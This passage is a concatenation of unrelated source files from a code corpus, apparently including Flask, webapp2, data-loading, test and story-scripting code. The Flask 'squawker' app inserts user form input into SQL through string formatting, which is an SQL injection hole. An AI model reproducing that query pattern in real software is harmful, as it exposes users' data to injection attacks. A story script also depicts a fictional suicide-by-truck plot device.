
redis.StrictRedis(host=SOCIAL_REDIS['host'],\n port=SOCIAL_REDIS['port'],\n db=SOCIAL_REDIS['db'])\n return redis_object\n","sub_path":"bin/views/social/social_base.py","file_name":"social_base.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"575044139","text":"#!/usr/bin/env python3\n\nfrom os.path import join\n\nimport hong2p.util as u\n\n\ndef test_load_experiment():\n r1 = join(u.raw_data_root(), '2019-11-21/4/tif_stacks/fn_0001.tif')\n r2 = join(u.raw_data_root(), '2020-03-09/2/fn_002/tif_stacks/fn_002.tif')\n c1 = join(u.analysis_output_root(),\n '2019-11-21/4/tif_stacks/fn_0001_nr.tif'\n )\n tiffs = [c1, r1, r2]\n for t in tiffs: #[2:]:\n print(t)\n data = u.load_recording(t)\n #import ipdb; ipdb.set_trace()\n\n\nif __name__ == '__main__':\n test_load_experiment()\n\n","sub_path":"test/test_load_recording.py","file_name":"test_load_recording.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"178117028","text":"from flask import Flask, g, render_template, request, redirect\nimport sqlite3\nfrom datetime import datetime\n\n# -- leave these lines intact --\napp = Flask(__name__)\n\n\ndef get_db():\n if not hasattr(g, 'sqlite_db'):\n db_name = app.config.get('DATABASE', 'squawker.db')\n g.sqlite_db = sqlite3.connect(db_name)\n\n return g.sqlite_db\n\n\ndef init_db():\n with app.app_context():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n@app.cli.command('initdb')\ndef initdb_command():\n \"\"\"Creates the database tables.\"\"\"\n init_db()\n print('Initialized the database.')\n\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, 'sqlite_db', None)\n if db is not None:\n db.close()\n# ------------------------------\n\n\n@app.route('/')\ndef root():\n conn = get_db()\n c = conn.cursor()\n s = \"SELECT squawk from squawks order by submitdate desc\"\n c.execute(s)\n allrows = c.fetchall()\n allsquawks = []\n for s in allrows:\n allsquawks.append(s[0])\n return render_template('home.html', allsquawks=allsquawks)\n\n\n@app.route('/submitNewSquawk', methods=[\"POST\"])\ndef submitNewSquawk():\n if len(str(request.form[\"squawk\"])) > 140:\n return render_template('home.html', error=\"Invalid squawk, too long\")\n conn = get_db()\n c = conn.cursor()\n time = str(datetime.now())\n s = 'INSERT INTO squawks VALUES (\"{}\", \"{}\")'.format(time, str(request.form[\"squawk\"]))\n c.execute(s)\n conn.commit()\n conn.close()\n return redirect('/')\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"squawker/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"125801901","text":"import csv\nimport numpy as np\nimport os\namino={'A':0,'C':1,'G':2,'T':3}\ndef get_labels(file_path):\n labels = []\n with open(file_path, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n labels.append(float(row[0]))\n return labels\n\n\ndef get_data_list():\n sentences = []\n tags = get_labels('5mC_features' + os.sep + 'DNA_label_train.csv')\n with open('5mC_features' + os.sep + \"DNA_train.csv\", 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n sentence = [x for x in row[0]]\n sentences.append(sentence)\n return sentences,tags\n\n\ndef 
read_file():\n sentences,target = get_data_list()\n feature1 = []\n feature2 = []\n feature3 = []\n for sentence in sentences:\n input = [amino[n] for n in sentence]\n feature1.append(np.eye(4)[input])\n\n with open('5mC_features'+os.sep+'NPF.csv', 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n input = [float(x) for x in row]\n feature2.append(input)\n\n with open('5mC_features'+os.sep+'One_hot.csv', 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n input = [float(x) for x in row]\n feature3.append(input)\n \n #feature1 = np.array(feature1)\n #feature2 = np.array(feature2)\n #feature3 = np.array(feature3)\n #feature2 = feature2.reshape(feature2.shape[0],41,-1)\n #feature3 = feature3.reshape(feature3.shape[0],41,-1)\n #将列表转换为tensor数据\n #feature = np.concatenate((feature3,feature2),axis=2)\n #feature = np.array(feature)\n\n feature = np.array(feature1)\n target = np.array(target)\n return feature, target\n\ndef get_data(file_name,dim1,dim2):\n _,target = get_data_list()\n feature = []\n with open('5mC_features' + os.sep + file_name+'.csv', 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n input = [float(x) for x in row]\n feature.append(input)\n feature = np.array(feature)\n feature = feature.reshape(feature.shape[0], dim1, dim2)\n target = np.array(target)\n return feature,target\n#feature,tag=read_file()\n#feature,tag = get_data('AAC',1,4)\n#print(feature.shape)\n#print(tag.shape)","sub_path":"code/get_DNA_data.py","file_name":"get_DNA_data.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"391372409","text":"# pylint: disable=missing-module-docstring, missing-function-docstring\n# pylint: disable=missing-class-docstring\n\nfrom unittest import TestCase\nfrom unittest.mock import Mock, patch, MagicMock\nfrom datetime import date\nfrom typing import List\nimport json\nfrom faker import Faker\nfrom candystore import CandyStore\n\nfrom tests.fixtures.fake_estimator import create_fake_pipeline\nfrom tests.fixtures import data_factories\nfrom augury.data_import import match_data\nfrom augury import api\nfrom augury import settings\nfrom augury.types import MLModelDict\n\n\nFAKE = Faker()\nTHIS_YEAR = date.today().year\nYEAR_RANGE = (2018, 2019)\nFAKE_ML_MODELS: List[MLModelDict] = [\n {\n \"name\": \"fake_estimator\",\n \"data_set\": \"fake_data\",\n \"prediction_type\": \"margin\",\n \"trained_to\": 2018,\n }\n]\nREQUIRED_MATCH_COLUMNS = {\n \"date\",\n \"year\",\n \"round_number\",\n \"home_team\",\n \"away_team\",\n \"venue\",\n \"home_score\",\n \"away_score\",\n \"match_id\",\n}\n\n\nclass TestApi(TestCase):\n # It doesn't matter what data Predictor returns since this method doesn't check\n @patch(\"augury.api.Predictor.make_predictions\")\n @patch(\"augury.api.settings.ML_MODELS\", FAKE_ML_MODELS)\n @patch(\"augury.api.PIPELINE_NAMES\", {\"fake_data\": \"fake\"})\n @patch(\n \"augury.settings.ProjectContext._get_pipelines\",\n MagicMock(return_value={\"fake\": create_fake_pipeline()}),\n )\n def test_make_predictions(self, mock_make_predictions):\n mock_make_predictions.return_value = CandyStore(seasons=YEAR_RANGE).fixtures()\n response = api.make_predictions(YEAR_RANGE, ml_model_names=[\"fake_estimator\"])\n\n # Check that it serializes to valid JSON due to potential issues\n # with pd.Timestamp and np.nan values\n self.assertEqual(response, json.loads(json.dumps(response)))\n\n data = response[\"data\"]\n\n 
self.assertIsInstance(data, list)\n self.assertIsInstance(data[0], dict)\n self.assertGreater(len(data[0].keys()), 0)\n mock_make_predictions.assert_called_with(FAKE_ML_MODELS)\n\n with self.subTest(ml_model_names=None):\n mock_make_predictions.reset_mock()\n api.make_predictions(YEAR_RANGE, ml_model_names=None)\n mock_make_predictions.assert_called_with(FAKE_ML_MODELS)\n\n def test_fetch_fixture_data(self):\n PROCESSED_FIXTURE_FIELDS = [\n \"date\",\n \"home_team\",\n \"year\",\n \"round_number\",\n \"away_team\",\n \"round_type\",\n \"venue\",\n \"match_id\",\n ]\n\n data_importer = match_data\n data_importer.fetch_fixture_data = Mock(\n return_value=CandyStore(seasons=YEAR_RANGE).fixtures()\n )\n\n response = api.fetch_fixture_data(\n f\"{YEAR_RANGE[0]}-01-01\",\n f\"{YEAR_RANGE[0]}-12-31\",\n data_import=data_importer,\n verbose=0,\n )\n\n matches = response[\"data\"]\n first_match = matches[0]\n\n self.assertEqual(set(first_match.keys()), set(PROCESSED_FIXTURE_FIELDS))\n\n fixture_years = list({match[\"year\"] for match in matches})\n self.assertEqual(fixture_years, [YEAR_RANGE[0]])\n\n def test_fetch_match_data(self):\n fake_match_results = CandyStore(seasons=YEAR_RANGE).match_results()\n data_importer = match_data\n data_importer.fetch_match_data = Mock(return_value=fake_match_results)\n\n response = api.fetch_match_data(\n f\"{YEAR_RANGE[0]}-01-01\",\n f\"{YEAR_RANGE[1]}-12-31\",\n data_import=data_importer,\n verbose=0,\n )\n\n matches = response[\"data\"]\n\n self.assertEqual(len(matches), len(fake_match_results))\n\n first_match = matches[0]\n\n self.assertEqual(\n set(first_match.keys()) & REQUIRED_MATCH_COLUMNS,\n REQUIRED_MATCH_COLUMNS,\n )\n\n match_years = list({match[\"year\"] for match in matches})\n self.assertEqual(match_years, [YEAR_RANGE[0]])\n\n def test_fetch_match_results_data(self):\n full_fake_match_results = CandyStore(seasons=1).match_results()\n round_number = FAKE.pyint(1, full_fake_match_results[\"round_number\"].max())\n fake_match_results = data_factories.fake_match_results_data(\n full_fake_match_results, round_number\n )\n\n data_importer = match_data\n data_importer.fetch_match_results_data = Mock(return_value=fake_match_results)\n\n response = api.fetch_match_results_data(\n round_number, data_import=data_importer, verbose=0\n )\n\n match_results = response[\"data\"]\n\n # It returns all available match results for the round\n self.assertEqual(\n len(match_results),\n len(fake_match_results.query(\"round == @round_number\")),\n )\n\n required_fields = set(\n [\n \"date\",\n \"year\",\n \"round_number\",\n \"home_team\",\n \"away_team\",\n \"home_score\",\n \"away_score\",\n ]\n )\n first_match = match_results[0]\n\n self.assertEqual(required_fields, set(first_match.keys()) & required_fields)\n\n match_rounds = {result[\"round_number\"] for result in match_results}\n self.assertEqual(match_rounds, set([round_number]))\n\n def test_fetch_ml_model_info(self):\n response = api.fetch_ml_model_info()\n\n models = response[\"data\"]\n\n self.assertEqual(models, settings.ML_MODELS)\n","sub_path":"src/tests/unit/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":5536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334042022","text":"#Sierre Wolfkostin\n#Templates\n\nimport webapp2\nimport os\nimport logging\nimport jinja2\n\n#set up the environment so you know where to store the files\nJINJA_ENVIRONMENT = jinja2.Environment(\n 
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n#create one handler for the three main web pages\nclass MainHandler(webapp2.RequestHandler):\n def get(self):\n\n #request the path, or the page the user wants to going to\n path = self.request.path\n\n #based on the path, decide which page template to render and which information to display\n if path == \"/home\":\n temp ='templates/home.html'\n info = {\"title\": \"Home\", \"page\":\"home\"}\n elif path == \"/food\":\n temp ='templates/food.html'\n info = {\"title\": \"Food\", \"page\":\"food\"}\n elif path == \"/family\":\n temp ='templates/family.html'\n info = {\"title\": \"Family\", \"page\":\"family\"}\n else:\n temp ='templates/home.html'\n info = {\"title\": \"Home\", \"page\":\"home\"}\n\n #load the correct template based on the variable values above \n template = JINJA_ENVIRONMENT.get_template(temp)\n self.response.write(template.render(info))\n\n\nclass Calchandler(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\"}))\n\n #this is called when the user submits the form\n def post(self):\n factor = self.request.get('type')\n if factor == \"circle\":\n radius = self.request.get('radius')\n try: \n radiusint = int(radius)\n answer = 3.14159*radiusint*radiusint\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"calcmessage\": \"The area of a circle with radius of \" + str(radiusint) + \" is \" + str(answer)}))\n except:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"calcmessage\":\"Please enter a number for your radius\"}))\n\n else:\n length = self.request.get('length')\n width = self.request.get('width')\n try:\n lengthint = int(length)\n widthint = int(width)\n answer = lengthint * widthint\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"calcmessage\": \"The area of a square with length \" + str(lengthint) + \" and width \" + str(widthint) + \" is \" + str(answer)}))\n except:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"calcmessage\":\"Please enter numbers for your length and width\"})) \n\n\n#create a second handler to only handle the login and loggedin pages\nclass LoginHandler(webapp2.RequestHandler):\n #render the first template displaying the form for the user to log into\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\"}))\n\n #this is called when the user submits the form\n def post(self):\n #get the name and the password input by the user\n \n answer1 = self.request.get('like')\n answer2 = self.request.get('wish')\n answer3 = self.request.get('occupation')\n\n if answer1 != \"\" and answer2 != \"\" and answer3 != \"\":\n score = 0\n if answer1 == \"bookworm\":\n score += 1\n elif answer1 == \"socialite\":\n score += 2\n else:\n score -= 1 \n if answer2 == \"bookworm\":\n score += 1\n elif answer1 == \"socialite\":\n score += 2\n else:\n score -= 1 \n if answer3 
== \"bookworm\":\n score += 1\n elif answer1 == \"socialite\":\n score += 2\n else:\n score -= 1 \n\n if score > 4:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\",\"message\": \"You are a socialite. You enjoy hanging out with friends and going to parties.\", \"title\": \"Login\", \"page\": \"activities\"}))\n elif score > 0:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\",\"message\": \"You are a bookworm. You prefer good books and quiet places.\", \"title\": \"Login\", \"page\": \"activities\"}))\n else:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\",\"message\": \"You are a sadist. You feel better when others are having a bad time. \", \"title\": \"Login\", \"page\": \"activities\"})) \n\n\n else:\n template = JINJA_ENVIRONMENT.get_template('templates/login.html')\n self.response.write(template.render({\"title\": \"Login\", \"page\": \"activities\", \"message\":\"Please fill in all bubbles to discover your personality type!\"}))\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler),\n ('/food', MainHandler),\n ('/family', MainHandler),\n ('/home', MainHandler),\n ('/calculate', Calchandler),\n ('/login', LoginHandler)\n], debug=True)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"304575808","text":"import numpy\r\nimport cv2\r\nvid=cv2.VideoCapture(0)\r\nc=[]\r\nwhile(1):\r\n a,b=vid.read()\r\n d,c=vid.read()\r\n c[:,:,2]=255\r\n cv2.imshow('fr',b)\r\n cv2.imshow('gr',c)\r\n if cv2.waitKey(1)==27 &0xFF:\r\n break\r\nvid.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"582024862","text":"# -*- coding: utf-8 -*-\n\"\"\"Story: yubijo chapter01.\n\"\"\"\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append('storybuilder')\n\nfrom storybuilder.builder import world as wd\n\n\n# episodes\ndef ep_avant(w: wd.World):\n z = w.zenzo\n lunchtime = w.day.meet.elapsed(hour=12)\n lunchafter = lunchtime.elapsed(hour=2)\n scenes = [\n w.tag.comment(\"善蔵(他)の一人称が原則\"),\n w.scene(\"男むさい職場\",\n z.feel().d(\"目の前を湯気と汗とそれからよく分からない雫が落ちていく\"),\n w.tencho.talk().t(\"何やってんだ!\",\n \"まだ餃子の皿洗えてねえのか!\"),\n z.reply().t(\"すみません!\",\n \"次で洗えます!\"),\n z.look().d(\"と返したものの\",\n \"まだ$zenzoの右手側でぐおんぐおん音を鳴らしている箱型の食洗機は赤いランプが点いたままだ。\",\n \"早く終われよこのチキショウ。\",\n \"という言葉をどこにも吐き出せないまま\",\n \"ただひたすらに目の前のシンクに溜まった泡なのか皿なのかコップなのか分からない代物へとゴム手袋の手を突っ込んでは\",\n \"灰色のプレートラックに次々と泡塗れの有象無象を並べていく\"),\n w.tencho.talk().t(\"次じゃなく今くれってんだよ!\",\n \"このドアホォが!\"),\n z.look().d(\"最近店の売上が振るわずにエリアマネージャーからどやされているらしい店長は\",\n \"ランチタイムで血圧上昇中なのか\",\n \"いつもに況して声がでかく\",\n \"言葉が乱暴だ\"),\n z.look().d(\"キッチンの喧騒に紛れてしまう小さな電子音を何とか捉えると\",\n \"$na_zenzoはレバーを持ち上げて蒸気を吹き出す食洗機から洗い終えたばかりの食器類が並ぶラックを右手側に押しやる。\",\n \"続いて既に並べ終えたもう片方のラックをセットしてレバーを下げると\",\n \"息つく暇もなく再び水と泡の大合奏が銀色の箱の中で始まる\"),\n z.talk().t(\"餃子皿です!\"),\n w.tencho.reply(\"おせーよ!\"),\n z.look().d(\"文句を言いつつも受け取ると\",\n \"焼き上がったところの餃子を盛り付けてデシャップに置いて\",\n 
\"すぐコンロに掛かったままの中華鍋に戻る\"),\n z.look().d(\"口は悪いが手さばきや動作の切れは幾つかアルバイトとして飲食店を渡り歩いてきた$na_zenzoから見ても\",\n \"有能な方だと思えた\"),\n z.think().d(\"それでも両隣で無言のまま調理を続ける同僚バイトたちは\",\n \"最近前髪が後退しつつある店長のことを「さっさと死ねばいい」と陰口を叩いていた\"),\n w.mikami.talk().t(\"$zenzo\", \"グラスまだ?\"),\n z.look().d(\"ホールの$mikamiだ。\",\n \"肩までの黒髪を右耳の裏側でくるりとまとめ\",\n \"彼女の意志の強さの表明であるような太眉が逆ハの字に$na_zenzoに向けられていた\"),\n z.ask().t(\"今並べますよ。\",\n \"それより今日のお客の入り具合どうです?\"),\n w.mikami.reply(\"普通じゃないかしら\"),\n z.be(w.stage.chineseshop, lunchtime),\n z.look(\"店内\").d(\"そう答えが返ってきたが\",\n \"彼女の肩越しにホールを見やると入り口の方までずらりと客が立って待っていた。\",\n \"それも何故かその半数以上が若そうな女性客ばかりだ。\",\n \"この近所で何かイベントでもあるのだろうか\"),\n z.talk().t(\"どこが普通なんですか。\",\n \"連休のランチタイムもいいとこじゃないですか\"),\n z.do().d(\"トレィに並べ終えたグラスを彼女に差し出しながらそう言うと、\"),\n w.mikami.talk().t(\"その目玉も洗った方がいいんじゃない?\"),\n z.look().d(\"何故か$na_zenzoを睨みつけてからホールに出て行ってしまった\"),\n z.talk().t(\"相変わらず冗談キツイぜ$part_mikami\"),\n z.look(\"満席\", w.i.moreusual.flag()).d(\"試しにもう一度覗いてみたが\",\n \"やはり$na_zenzoには店の壁に沿ってずらりと並ぶ大量の若い女性客が\",\n \"席が空くのを今か今かと待ち構えている様子が見えた\"),\n z.talk().t(\"やっぱ混みまくりじゃないすか\"),\n z.do(\"皿を割る\").d(\"新しく運び込まれた皿を手に取り\",\n \"シンクに向き直って放り込もうとした\",\n \"その視界が一瞬ぐらつく\"),\n w.tencho.talk().t(\"おい!\",\n \"$zenzo!\",\n \"お前またやりやがったのか!\"),\n z.hear().d(\"何のことかと思って足元を見ると\",\n \"そこには複数枚の大皿が粉々になって散らばっていた\"),\n w.tencho.talk().t(\"これで今日何枚目だと思ってんだ!\",\n \"お前はバイト代いらねえのか!\"),\n z.reply().t(\"す、すみません!\"),\n z.do(w.tencho, \"angry\").d(\"咄嗟に頭を下げたが\",\n \"そんなもので店長の怒りが収まるはずもなく\",\n \"何度も足元の「店長専用」と書かれたダンボール箱に蹴りを入れていた\"),\n ),\n w.scene(\"バイトクビだってよ\",\n z.do().d(\"何とか繁忙時間を乗り切った$heroは\",\n \"一人ロッカー室で汗をたっぷり吸ったシャツを脱ごうとしていた\"),\n z.talk(w.tencho, \"疲れてるか?\"),\n z.look().d(\"そこに店長が入ってきて\",\n \"額に張り付きそうになっていた帽子を取ると\",\n \"パイプの丸椅子を軋ませて座り\",\n \"煙草を吸い始めた\"),\n w.tencho.talk(w.i.rumor_ghostdead).t(\"お前聞いたことあるか。\",\n \"知らない奴を最近よく見るなと思ってたら\",\n \"いつの間にかそいつらが家の中まで入ってくるようになって\",\n \"ある日突然蒸発したように消えるんだそうだ\"),\n z.reply().t(\"か、怪談話すか?\"),\n z.think().d(\"$tenchoがいきなり話題を振ってくるのは\",\n \"何も珍しいことじゃなかった。\",\n \"ただやたら自分の顔を見てくるので\",\n \"そろそろ今日の小言が始まるのかと$heroは覚悟を決める\"),\n w.tencho.talk().t(\"知らない間に幽霊が見えるようになって\",\n \"そのうちに自分まで幽霊になっちまうっていうので\",\n \"世間じゃ『幽霊死』って呼ばれてるんだとさ\"),\n z.know(w.tencho, w.i.rumor_ghostdead).d(\"その現象も言葉も初耳だった\"),\n z.have(w.i.salary, w.tencho),\n w.tencho.talk().t(\"$meはさ\",\n \"これまでそういうお化けだとか妖怪だとかさ\",\n \"UFOでも何でもさ\",\n \"いる訳ねえし信じてる奴みんな馬鹿だろうって\",\n \"そう思ってたくらいなんだわ\"),\n z.reply().t(\"はあ\"),\n w.tencho.talk(w.i.allupbusiness.flag(), \"お前が来てから\").t(\"お前の所為とは思ってないんだが\",\n \"どうもお前がうちに来てからどんどん売上が落ちてるんだよな\"),\n z.think().d(\"ああ、そっちか。\",\n \"と内心では思いながらも\",\n \"$heroは黙って頷く\"),\n w.tencho.talk().t(\"別に信じてる訳じゃねえんだが\",\n \"お前さ\",\n \"ひょっとしてその幽霊なんじゃねえか?\"),\n z.reply().t(\"あの$tencho\", \"$meは\"),\n w.tencho.talk().t(\"悪いが$hata\", \"ここ辞めてくれねえかな?\"),\n z.talk(w.tencho, w.i.firejob),\n z.know(w.i.firejob),\n ),\n w.scene(\"そうだ異世界に行こう\",\n z.look().d(\"大通りを窓全開にして走り抜けて行った運送業者のトラックからは\",\n \"最近流行りらしい$natsumeの演歌が大ボリュームで漏れ響いていた\"),\n z.look(w.stage.city13).d(\"汗で背中に張り付く下着を気持ち悪いと感じつつ\",\n \"$heroは上着のボタンシャツの袖を捲る。\",\n \"右肩に引っ掛けた細身のリュックにはつい十分ほど前に渡された給料袋が差し込んであったが\",\n \"その数千円が彼の全財産と言っても良かった\"),\n w.stage.city13.explain(\"都心から離れた町\").d(\"ここ$st_city13は都心から随分と距離があるというのにも関わらず\",\n \"昼夜問わずにかなりの交通量がある。\",\n \"しかもその大半は何らかを運んでいる\",\n \"所謂トラックと呼ばれるものだ\"),\n z.go(w.stage.street).d(\"$heroは狭い歩道に佇みながら\",\n \"一冊の文庫本を\",\n \"ブックカバーも着けずに開いていた\"),\n z.look(w.truck),\n z.think(\"近所に工場が多い\"),\n z.remember(w.i.rumor_ghosthouse.flag()),\n z.go(w.stage.bookstore),\n z.have(w.GAnovel).d(\"本のタイトルは$GAtitleという\",\n \"それだけで内容を言い表しているような気がしないでもないが\",\n \"流石に長過ぎて誰も正式名称を呼ばないという\",\n \"最近ありがちな商品展開をしている作品だ\"),\n 
z.think().d(\"ちなみに通称は「$GAshorttitle」である\"),\n z.think().d(\"そういった小説を読むことは数少ない$heroの趣味だったが\",\n \"ただただ個人の欲望の垂れ流しを肯定するだけの内容を\",\n \"思考停止の現実逃避だと\",\n \"ネット上の知人に馬鹿にされることも多かった\"),\n z.look(w.GAnovel, w.i.beauty),\n z.think(\"付き合いたい\").d(\"それでも今$heroは純粋に思うのだ\"),\n z.think(w.i.zenzolove).t(\"美少女と付き合いたい……\"),\n z.think().d(\"そしてその為にはどうにかこうにか「異世界」というものに行かなければならない\"),\n z.remember(w.GAnovel, \"異世界もの\"),\n z.be(w.i.despair),\n z.think(w.i.suicide, \"異世界に行ける\"),\n ),\n w.scene(\"トラックバイバイ\",\n z.go(w.stage.street),\n z.look().d(\"目の前を何台もトラックが連なり\",\n \"軽快に走り抜けていく\"),\n z.do(w.i.suicide, \"$want\").d(\"痛いだろうか\"),\n z.do(w.i.hittruck, w.i.suicide).d(\"色々と迷惑が掛かるだろうか\"),\n w.truckdriver.look(w.zenzo),\n z.look().d(\"ふと視線を上げるとスマートフォンを片手に持ちながら運転席に座っている髭面の男性と\",\n \"目が合った\"),\n z.feel(\"blackout\").d(\"彼はブレーキに足を置いただろう\"),\n z.think().d(\"けれどその結果を知ることは\",\n \"$heroには叶わなかった\"),\n z.think().d(\"何故なら彼の意識はスマホの電源が切れた時のように\",\n \"一瞬でブラックアウトしてしまったからだ\"),\n ),\n ]\n return [w.chaptertitle(\"そうだ異世界に行こう\"),\n *scenes,\n ]\n\n\ndef ep_meetbijo(w: wd.World):\n z = w.zenzo\n akebi = w.akebi\n scenes = [\n w.scene(\"目覚めたら美女\",\n z.look(w.akebi, \"美女\"),\n z.look(w.stage.ghosthome, w.day.meet),\n z.meet(w.akebi),\n z.ask(akebi, \"自分はどうしてここに?\"),\n akebi.talk(w.zenzo, \"家の前で寝ていた\"),\n z.ask(w.akebi, \"彼女のこと\"),\n w.tag.comment(\"先月死ん��がそれを仄かに読み取らせる\"),\n akebi.reply(\"仕事はやめた\"),\n akebi.talk(\"大好きな人にフラレて\"),\n z.feel(\"同情\"),\n z.talk(akebi, \"励ます\"),\n akebi.reply(\"あなたみたいな人なら良かったのに\"),\n z.do(w.akebi, \"love\", \"$want\"),\n akebi.reply(w.zenzo, \"照れる\"),\n akebi.ask(\"ご飯食べます?\"),\n akebi.go(\"台所\"),\n ),\n w.scene(\"そこは幽霊屋敷\",\n z.look(\"家を見て回る\"),\n z.look(\"木造家屋\", \"二階建て\"),\n z.look(\"ベランダからの景色\", \"見覚え\"),\n z.know(\"二階\"),\n akebi.come(\"犬粥\"),\n z.ask(\"どうやって二階まで?\"),\n akebi.reply(\"普通に\"),\n akebi.do(\"鍋落とす\"),\n z.look(\"鍋浮かんでいる\"),\n akebi.talk(\"ごめんなさい\"),\n akebi.do(\"鍋\", \"浮かべて運ぶ\"),\n z.think(w.akebi, \"能力者\"),\n z.ask(w.akebi, \"能力?\"),\n akebi.reply(w.zenzo, \"no\"),\n z.look(\"美味しそうに見える粥\"),\n z.do(\"eat\"),\n akebi.talk(w.zenzo, w.i.akebi_history),\n akebi.talk(\"男運がない\"),\n z.talk(akebi, \"魅力的だ\"),\n ),\n w.scene(\"告白したら幽霊だった\",\n akebi.reply(\"まだちゃんと付き合ったことない\"),\n z.know(w.akebi, w.i.shojo),\n z.talk(w.akebi, w.i.gosteady),\n z.do(w.akebi, w.i.gosteady, \"yes\"),\n w.zenzo.think(w.akebi, w.i.nohuman.flag()),\n akebi.talk(\"実は\"),\n z.ask(akebi, w.i.akebi_reason),\n w.akebi.reply(w.zenzo, \"yes\", w.i.nohuman.deflag()),\n akebi.reply(\"死んだんです\"),\n akebi.talk(\"幽霊なんです\"),\n w.zenzo.know(w.akebi, w.i.ghost),\n z.remember(w.i.rumor_ghosthouse.deflag()),\n ),\n ]\n return [w.chaptertitle(\"美女に出会った\"),\n *scenes,\n ]\n\n\ndef ep_bijoghost(w: wd.World):\n z, akebi, murako = w.zenzo, w.akebi, w.murako\n scenes = [\n w.scene(\"幽霊が美女なら問題ない\",\n z.be(w.stage.ghosthome, w.day.meet),\n z.be(w.akebi, w.i.gosteady),\n z.ask(w.akebi, \"本当に?\"),\n akebi.reply(\"yes\"),\n z.feel(\"happy\"),\n w.zenzo.know(w.akebi, \"色々なこと\"),\n akebi.ask(z, \"幽霊でもいいの?\"),\n z.reply(\"美少女なら問題ない\"),\n akebi.feel(\"happy\"),\n w.zenzo.do(w.akebi, w.i.kiss, \"$want\"),\n z.do(\"kiss\", akebi),\n z.look(akebi, \"肌にハリが出る\", w.i.akebi_happy.flag()),\n ),\n w.scene(\"進まない時\",\n z.look(\"wake\"),\n z.look(\"clock\", \"昨日と同じ\"),\n z.ask(akebi, \"時間のこと\"),\n akebi.reply(\"わからない\"),\n z.be(\"翌日も同じ\"),\n akebi.talk(\"気にしなくていい\"),\n z.do(\"kiss\", akebi),\n z.look(\"体にカビ\"),\n z.think(\"このままだと死ぬ?\"),\n z.ask(\"外に出る\"),\n akebi.reply(\"また離れていくの?\"),\n z.go(\"夜中\"),\n z.go(\"外\"),\n z.meet(murako),\n ),\n w.scene(\"退魔師も美女\",\n 
murako.talk(\"退治する\"),\n murako.talk(w.i.ghostbuster, z),\n z.explain(murako, akebi),\n murako.talk(akebi, w.i.ghost),\n z.talk(akebi, \"悪い奴じゃない\"),\n murako.talk(\"幽霊は悪\"),\n murako.talk(z, \"幽霊を見られる能力がある\"),\n murako.talk(z, w.i.ghost_absorb),\n z.think(\"自分が窶れている\"),\n z.know(w.i.moreusual.deflag(), w.i.allupbusiness.deflag()),\n murako.talk(z, w.i.akebi_buster),\n w.zenzo.ask(w.akebi, w.i.ghost),\n z.ask(murako, w.i.buster_method),\n w.murako.talk(z, w.i.akebi_happy.deflag()),\n murako.reply(z, w.i.break_love),\n z.know(w.i.buster_method),\n ),\n ]\n return [w.chaptertitle(\"幽霊が美女なら問題ないよね\"),\n *scenes,\n ]\n\n\n# main\ndef story(w: wd.World):\n return (w.maintitle(\"第一話 無職が自殺しても���題ないよね?\"),\n ep_avant(w),\n ep_meetbijo(w),\n ep_bijoghost(w),\n )\n\n\ndef main(): # pragma: no cover\n import src.yubijo.story as mainstory\n w = mainstory.world()\n return w.build(story(w))\n\n\nif __name__ == '__main__':\n import sys\n 